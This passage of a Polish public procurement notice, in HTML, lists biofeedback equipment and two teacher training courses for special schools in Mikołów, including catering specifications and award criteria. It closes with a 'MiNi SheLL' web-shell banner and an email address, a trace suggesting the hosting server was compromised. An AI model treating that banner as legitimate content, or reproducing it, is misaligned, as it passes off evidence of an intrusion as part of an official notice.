                      okres w dniach: 90<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>termin realizacji</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa materiałów dydaktycznych GRUPA II BIOFEEDBACK do ZSS nr 1 i ZSS nr 2 Specjalnych w Mikołowie wg załącznika nr 2b wraz ze szkoleniami pn.:  1. nIR HEG BIOFEEDBACK W ADD I ADHD 2. BIOFEEDBACK I stopień.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot zamówienia w zadaniu II obejmuje dostawę poniższych pomocy dydaktycznych, których szczegółowy opis  zawiera załącznik nr 2b do SIWZ:
1. Aparat EEG Biofeedback 2 kanałowy lub równoważny.
2. HEG-System do procomp 5 równoważne
3. Aktualizacja do programu Biograf Infiniti 6.0 lub równoważne.
4. Dodatkowe plansze stymulacyjne Biofeedback EEG lub równoważne
5. Czujnik oddechowy
6. Gry Flash pakiet 5 gier lub równoważne
7.  Animacje biograph X Infiniti dvd.
8. BioFun games lub równoważne
9. Gra Zukor Zukor's Carnival lub równoważna.
10. Fotel masujący wypoczynkowy z ogrzewaniem.

Szkolenie p.n. nIR HEG BIOFEEDBACK W ADD I ADHD 
Metoda nIR HEG-biofeedback lub równoważna proponowana podczas szkolenia powinna być nowatorska i w odróżnieniu od powszechnie w Polsce znanej metody EEG-biofeedback ma analizować aktywność trenowanego obszaru mózgu za pomocą podczerwieni, co pozwoli na ocenę procentowej zmiany jego natlenienia. Proponowana metoda ma cechować się prostotą obsługi urządzenia, analizą wyników, a także zredukowaniem do minimum czynności przygotowawczych (bez używania past, klejenia elektrod, przygotowania skóry itp.). W zapisie nie mogą występować artefakty, takie jak mruganie oczami, co pozwoli wykonywać treningi obszarów czołowych bez żadnych zakłóceń.
1.Szczegóły dotyczące realizacji szkolenia:
a) Szkolenie przeznaczone jest dla 2 nauczycieli szkoły specjalnej prowadzącej zajęcia z uczniami posiadającymi orzeczenia o potrzebie kształcenia specjalnego.
b) Wymiar szkolenia   minimum 5 h dla każdego z uczestników szkolenia;
c) Szkolenie realizowane będzie na terenie i w budynku wskazanym przez Wykonawcę;
d) Wykonawca zapewnia salę szkoleniową, materiały dydaktyczne, przerwę kawową i obiad;
e) Wykonawca zobowiązuje się do wystawienia certyfikatu potwierdzającego udział w szkoleniu.
2.  W trakcie przerwy w szkoleniu Wykonawca zapewni uczestnikom gorące napoje w postaci kawy i herbaty z dodatkami  w postaci  cukru, mleka i cytryny w ilości według uznania konsumenta. Dodatkowo w czasie kursu zapewni  wodę mineralną i sok w butelkach min. 120 ml. W czasie przerwy obiadowej Wykonawca dostarczy uczestnikom gorący posiłek w formie drugiego dania w zamkniętych naczyniach jednorazowych z plastikowymi sztućcami i serwetkami oraz z dodatkiem napoju w formie soku, owocu lub batonika. Posiłek powinien posiadać gramaturę nie mniej niż 450 gram posiłku przygotowanego do spożycia i kaloryczność nie mniej niż 700 kcal; w przypadku dania mięsnego lub rybnego: ziemniaki, kasza, ryż, makaron - nie mniej niż 150 g; mięso- ryba nie mniej niż 150-200g, surówka nie mniej niż 150g.
3. Szkolenie BIOFEEDBACK I stopień
Program szkolenia powinien obejmować tematykę proponowaną przez BCIA (Biofeedback Certification Institute of America) lub równoważną. Omawiane zagadnienia dotyczyć powinny podstaw EEG (elektroencefalografii), systemu 1020, teorii metody biofeedback lub równoważnej, zasad prowadzenia terapii pacjenta, a także protokołów terapeutycznych dla danego zaburzenia.
 1.Szkolenie w części praktycznej powinno obejmować:
a) obsługę podstawowych funkcji programu; prowadzenie sesji treningowej, zarządzanie bazą danych; 
b) przeglądanie i odtwarzanie zapisanych sesji, raportów i statystyk; 
c) obsługę podstawowych protokołów treningowych; 
d) obsługę edytora ekranów Lite  w tym dostosowywanie ekranu do potrzeb treningu.
2.W trakcie szkolenia prowadzący powinien zapewnić:
a) solidne wprowadzenie teoretyczne, w tym przegląd najnowszych badań naukowych;
b) dużą liczbę zajęć praktycznych w małych grupach przy aparaturze;
c) pracę z najwyższej klasy aparaturą biofeedback (system Infiniti) lub równoważną;
d) pokaz innych metod i urządzeń, w tym metody HEG-biofeedback i metody Warnkego.
3.Szczegóły dotyczące realizacji szkolenia:
1.	Szkolenie przeznaczone jest dla 5 nauczycieli szkoły specjalnej prowadzącej zajęcia z uczniami posiadającymi orzeczenia o potrzebie kształcenia specjalnego; 
2.	Wymiar szkolenia   minimum 38 h  dla każdego z uczestników, podzielone na min. 4 dni wykładowe.
3.     Szkolenie przeprowadzi osoba posiadająca wymagane uprawnienia i doświadczenie w zakresie objętym szkoleniem.
3.	Szkolenie realizowane będzie na terenie i w budynku wskazanym przez Wykonawcę;
4.	Wykonawca zapewnia salę szkoleniową, materiały dydaktyczne, przerwy kawowe i obiad;
5. 	Kurs zakończony ma być egzaminem, a uczestnik ma otrzymać certyfikat upoważniający                   do prowadzenia diagnostyki, terapii i treningów metodą EEG-biofeedback.
 W trakcie przerwy w szkoleniu Wykonawca zapewni uczestnikom gorące napoje w postaci kawy i herbaty z dodatkami  w postaci  cukru, mleka i cytryny w ilości według uznania konsumenta. Dodatkowo w czasie kursu zapewni  wodę mineralną i sok w butelkach min. 120 ml. W czasie przerwy obiadowej Wykonawca dostarczy uczestnikom gorący posiłek w formie drugiego dania w zamkniętych naczyniach jednorazowych z plastikowymi sztućcami i serwetkami oraz z dodatkiem napoju w formie soku, owocu lub batonika. Posiłek powinien posiadać gramaturę nie mniej niż 450 gram posiłku przygotowanego do spożycia i kaloryczność nie mniej niż 700 kcal; w przypadku dania mięsnego lub rybnego: ziemniaki, kasza, ryż, makaron - nie mniej niż 150 g; mięso- ryba nie mniej niż 150-200g, surówka nie mniej niż 150g.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39162100-6, 80510000-2,
                    48190000-6,
                    48520000-9,
                    33196200-2,
                    39162110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 90<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>termin realizacji</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com